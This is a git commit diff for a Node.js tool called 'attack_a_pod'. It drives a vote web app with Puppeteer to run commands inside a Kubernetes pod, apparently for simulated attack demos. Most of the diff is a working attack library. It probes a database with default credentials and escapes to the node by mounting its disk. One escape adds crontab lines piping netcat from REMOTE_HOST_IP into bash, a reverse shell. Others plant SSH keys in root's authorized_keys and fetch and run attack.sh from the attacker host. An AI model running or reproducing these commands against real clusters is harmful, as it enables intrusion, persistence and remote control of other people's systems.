feat(ssh) use ssh for simulated attack instead of nc

attack_a_pod/Dockerfile

@@ -1,4 +1,5 @@
 FROM buildkite/puppeteer
 
+ENV PUPPETEER_EXECUTABLE_PATH="/usr/bin/google-chrome-stable"
 RUN npm install commander --save
 

attack_a_pod/attack_a_pod.js

@@ -1,106 +1,44 @@
-const { program } = require('commander');
+const {program} = require('commander');
 program.version('0.0.1');
 const puppeteer = require('puppeteer')
 const lib = require('./lib/lib')
+const attacks = require('./lib/attacks').default
 
 global.verbose = false
 
-let attacks = {
-  'test_attack': {
-    'parameter': { 'option_key': 'dirname', 'replace': 'DIR_NAME'},
-    'commands': [ 'touch DIR_NAME' ]
-  },
-  'postgres_attack': {
-    'commands': [
-      "apt-get update",
-      "apt-get install -y postgresql-client",
-      "curl --max-time 15 database",
-      "curl --max-time 15 mysql",
-      "curl --max-time 15 postgres",
-      "curl --max-time 15 storage",
-      "curl --max-time 15 db",
-      "export PGPASSWORD='postgres'; psql -h db -U postgres -c 'SELECT * FROM votes, pg_sleep(15)'"
-    ],
-  },
-  'escape_pod_via_cron_aws': {
-    'parameter': { 'option_key': 'remote', 'replace': 'REMOTE_HOST_IP'},
-    'commands': [
-      "mkdir -p /mnt/node_volume",
-      "mount /dev/xvda1 /mnt/node_volume",
-      "rm /mnt/node_volume/run.sh",
-      "echo '* * * * * root yum install -y nc' >> /mnt/node_volume/etc/crontab",
-      "echo '* * * * * root /usr/bin/nc REMOTE_HOST_IP 5555 | /bin/bash' >> /mnt/node_volume/etc/crontab"
-    ],
-  },
-  'escape_pod_via_ssh_aws': {
-    'parameter': { 'option_key': 'remote', 'replace': 'REMOTE_HOST_IP'},
-    'commands': [
-      "mkdir -p /mnt/node_volume",
-      "mount /dev/xvda1 /mnt/node_volume",
-      "rm -rf .ssh; mkdir .ssh",
-      "apt update; apt install ssh-client -y",
-      "ssh-keygen -t rsa -N '' -f .ssh/id_rsa",
-      "cat .ssh/id_rsa.pub >> /mnt/node_volume/root/.ssh/authorized_keys",
-      "SSH_HOST=$(cat /mnt/node_volume/etc/hostname); ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i .ssh/id_rsa root@$SSH_HOST 'yum update; yum install -y nc'",
-      "SSH_HOST=$(cat /mnt/node_volume/etc/hostname); ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i .ssh/id_rsa root@$SSH_HOST 'sudo /usr/bin/nc REMOTE_HOST_IP 5555 | /bin/bash'",
-    ],
-  },
-  'escape_pod_via_ssh_azure': {
-    'parameter': { 'option_key': 'remote', 'replace': 'REMOTE_HOST_IP'},
-    'commands': [
-      "mkdir -p /mnt/node_volume",
-      "mount /dev/sda1 /mnt/node_volume",
-      "rm -rf .ssh; mkdir .ssh",
-      "apt update; apt install ssh-client tar -y",
-      "ssh-keygen -t rsa -N '' -f .ssh/id_rsa",
-      "cat .ssh/id_rsa.pub >> /mnt/node_volume/home/azureuser/.ssh/authorized_keys",
-      "SSH_HOST=$(cat /mnt/node_volume/etc/hostname); ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i .ssh/id_rsa azureuser@$SSH_HOST 'sudo apt-get install -y netcat'",
-      "SSH_HOST=$(cat /mnt/node_volume/etc/hostname); ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i .ssh/id_rsa azureuser@$SSH_HOST 'sudo nc REMOTE_HOST_IP 5555 | /bin/bash'",
-    ],
-  },
-  'escape_pod_via_ssh_gcp': {
-    'parameter': { 'option_key': 'remote', 'replace': 'REMOTE_HOST_IP'},
-    'commands': [
-      "mkdir -p /mnt/node_volume",
-      "mount /dev/sda1 /mnt/node_volume",
-      "rm -rf .ssh; mkdir .ssh",
-      "apt update; apt install ssh-client tar -y",
-      "ssh-keygen -t rsa -N '' -f .ssh/id_rsa",
-      "cat .ssh/id_rsa.pub >> /mnt/node_volume/root/.ssh/authorized_keys",
-      "SSH_HOST=$(cat /mnt/node_volume/etc/hostname); ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i .ssh/id_rsa root@$SSH_HOST 'sudo apt-get install -y netcat'",
-      "SSH_HOST=$(cat /mnt/node_volume/etc/hostname); ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i .ssh/id_rsa root@$SSH_HOST 'sudo /usr/bin/nc REMOTE_HOST_IP 5555 | /bin/bash'",
-    ],
-  },
-
-}
-
-async function run () {
+async function run() {
   program
     .option('-u, --url <vote_app_url>', 'url of the vote app')
     .option('-a, --attack <attack_to_run>', 'attacks: ' + Object.keys(attacks).toString())
     .option('-r, --remote <remote_host_ip>', 'attackers remote host ip address')
+    .option('-k, --sshkey <path to ssh key>', 'ssh private key to be used')
+    .option('-p, --sshpubkey <path to ssh pub key>', 'ssh public key to be used')
     .option('-d, --dirname <directory_name>', 'directory name to create for test attack')
     .option('-v, --verbose', 'verbose output and screenshots')
   program.parse(process.argv);
   const options = program.opts();
 
-  if(options['verbose']){
+  if (options['verbose']) {
     console.log('Verbose mode enabled')
     global.verbose = true
   }
 
+  if (options['sshkey']) {
+    options['sshkey'] = options['sshkey'].replace(/\n/gm, "||||")
+  }
+
   let url = lib.get_url(options);
   let attack_type = lib.get_attack_type(options, attacks)
 
   let attack = attacks[attack_type]
   attack = lib.replace_command_with_parameters(attack, options)
 
-  console.log('Running attack: '+ attack_type)
-  console.log('Vote App: '+ url)
+  console.log('Running attack: ' + attack_type)
+  console.log('Vote App: ' + url)
 
   const browser = await puppeteer.launch({args: ['--no-sandbox']});
   const page = await browser.newPage();
-  await page.setViewport({ width: 1366, height: 850});
+  await page.setViewport({width: 1366, height: 850});
 
   try {
     await page.goto(url);
@@ -115,9 +53,9 @@ async function run () {
     await lib.run_commands(page, attack['commands'])
   } catch (err) {
     console.log(err)
-  }finally{
+  } finally {
     browser.close();
   }
 }
 
-run();
+run();

attack_a_pod/lib/attacks.js

@@ -0,0 +1,93 @@
+exports.default = {
+  'test_attack': {
+    'parameter': {'option_key': 'dirname', 'replace': 'DIR_NAME'},
+    'commands': ['touch DIR_NAME']
+  },
+  'postgres_attack': {
+    'commands': [
+      "apt-get update",
+      "apt-get install -y postgresql-client",
+      "curl --max-time 15 database",
+      "curl --max-time 15 mysql",
+      "curl --max-time 15 postgres",
+      "curl --max-time 15 storage",
+      "curl --max-time 15 db",
+      "export PGPASSWORD='postgres'; psql -h db -U postgres -c 'SELECT * FROM votes, pg_sleep(15)'"
+    ],
+  },
+  'escape_pod_via_cron_aws': {
+    'parameter': {'option_key': 'remote', 'replace': 'REMOTE_HOST_IP'},
+    'commands': [
+      "mkdir -p /mnt/node_volume",
+      "mount /dev/xvda1 /mnt/node_volume",
+      "rm /mnt/node_volume/run.sh",
+      "echo '* * * * * root yum install -y nc' >> /mnt/node_volume/etc/crontab",
+      "echo '* * * * * root /usr/bin/nc REMOTE_HOST_IP 5555 | /bin/bash' >> /mnt/node_volume/etc/crontab"
+    ],
+  },
+  'escape_pod_via_ssh_aws': {
+    'parameter': [
+      {'option_key': 'remote', 'replace': 'REMOTE_HOST_IP'},
+      {'option_key': 'sshkey', 'replace': 'SSH_KEY'},
+      {'option_key': 'sshpubkey', 'replace': 'SSH_PUBKEY'},
+    ],
+    'commands': [
+      "hostname",
+      "mkdir -p /mnt/node_volume",
+      "mount /dev/xvda1 /mnt/node_volume",
+      "rm -rf .ssh; mkdir .ssh",
+      "apt update; apt install ssh-client -y",
+      "echo 'SSH_KEY' > .ssh/id_rsa.raw",
+      "cat .ssh/id_rsa.raw | sed 's/||||/\\\\n/g' > .ssh/id_rsa",
+      "echo 'SSH_PUBKEY' > .ssh/id_rsa.pub",
+      "cat .ssh/id_rsa.pub >> /mnt/node_volume/root/.ssh/authorized_keys",
+      "cp .ssh/id_rsa /mnt/node_volume/root/.ssh/id_rsa",
+      "chmod 0600 .ssh/id_rsa /mnt/node_volume/root/.ssh/id_rsa",
+      "echo 'ssh -i /root/.ssh/id_rsa -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null ec2-user@REMOTE_HOST_IP /bin/cat attack.sh > /tmp/attack.sh; sh -x /tmp/attack.sh' >> /mnt/node_volume/root/run.sh",
+      "SSH_HOST=$(cat /mnt/node_volume/etc/hostname); ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i .ssh/id_rsa root@$SSH_HOST sh -x ./run.sh",
+    ],
+  },
+  'escape_pod_via_ssh_azure': {
+    'parameter': [
+      {'option_key': 'remote', 'replace': 'REMOTE_HOST_IP'},
+      {'option_key': 'sshkey', 'replace': 'SSH_KEY'},
+      {'option_key': 'sshpubkey', 'replace': 'SSH_PUBKEY'},
+    ],
+    'commands': [
+      "mkdir -p /mnt/node_volume",
+      "mount /dev/sda1 /mnt/node_volume",
+      "rm -rf .ssh; mkdir .ssh",
+      "apt update; apt install ssh-client tar -y",
+      "echo 'SSH_KEY' > .ssh/id_rsa.raw",
+      "cat .ssh/id_rsa.raw | sed 's/||||/\\\\n/g' > .ssh/id_rsa",
+      "echo 'SSH_PUBKEY' > .ssh/id_rsa.pub",
+      "cat .ssh/id_rsa.pub >> /mnt/node_volume/root/.ssh/authorized_keys",
+      "cp .ssh/id_rsa /mnt/node_volume/root/.ssh/id_rsa",
+      "chmod 0600 .ssh/id_rsa /mnt/node_volume/root/.ssh/id_rsa",
+      "echo 'ssh -i /root/.ssh/id_rsa -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null azureuser@REMOTE_HOST_IP /bin/cat attack.sh > /tmp/attack.sh; sh -x /tmp/attack.sh' >> /mnt/node_volume/root/run.sh",
+      "SSH_HOST=$(cat /mnt/node_volume/etc/hostname); ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i .ssh/id_rsa root@$SSH_HOST sh -x ./run.sh",
+    ],
+  },
+  'escape_pod_via_ssh_gcp': {
+    'parameter': [
+      {'option_key': 'remote', 'replace': 'REMOTE_HOST_IP'},
+      {'option_key': 'sshkey', 'replace': 'SSH_KEY'},
+      {'option_key': 'sshpubkey', 'replace': 'SSH_PUBKEY'},
+    ],
+    'commands': [
+      "mkdir -p /mnt/node_volume",
+      "mount /dev/sda1 /mnt/node_volume",
+      "rm -rf .ssh; mkdir .ssh",
+      "apt update; apt install ssh-client tar -y",
+      "echo 'SSH_KEY' > .ssh/id_rsa.raw",
+      "cat .ssh/id_rsa.raw | sed 's/||||/\\\\n/g' > .ssh/id_rsa",
+      "echo 'SSH_PUBKEY' > .ssh/id_rsa.pub",
+      "cat .ssh/id_rsa.pub >> /mnt/node_volume/root/.ssh/authorized_keys",
+      "cp .ssh/id_rsa /mnt/node_volume/root/.ssh/id_rsa",
+      "chmod 0600 .ssh/id_rsa /mnt/node_volume/root/.ssh/id_rsa",
+      "echo 'ssh -i /root/.ssh/id_rsa -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null root@REMOTE_HOST_IP /bin/cat attack.sh > /tmp/attack.sh; sh -x /tmp/attack.sh' >> /mnt/node_volume/root/run.sh",
+      "SSH_HOST=$(cat /mnt/node_volume/etc/hostname); ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i .ssh/id_rsa root@$SSH_HOST sh -x ./run.sh",
+    ],
+  },
+
+}

attack_a_pod/lib/lib.js

@@ -26,14 +26,20 @@ module.exports = {
   replace_command_with_parameters: function (attack, options){
     // if the attack has parameters run each replacement for each command
     if(attack['parameter'] != undefined){
-      paramater = attack['parameter']
-      if(!options[paramater['option_key']]){
-        console.log('Must provide option: ' + paramater['option_key'])
-        process.exit(1);
-      }
-      for (let key in attack['commands']) {
-        attack['commands'][key] = attack['commands'][key].replace(paramater['replace'], options[paramater['option_key']])
+      let parameter = attack['parameter']
+      if (!Array.isArray(attack['parameter'])) {
+        parameter = [attack['parameter']]
       }
+
+      parameter.forEach(p => {
+        if(!options[p['option_key']]){
+          console.log('Must provide option: ' + p['option_key'])
+          process.exit(1);
+        }
+        for (let key in attack['commands']) {
+          attack['commands'][key] = attack['commands'][key].replace(p['replace'], options[p['option_key']])
+        }
+      })
     }
     return attack
   },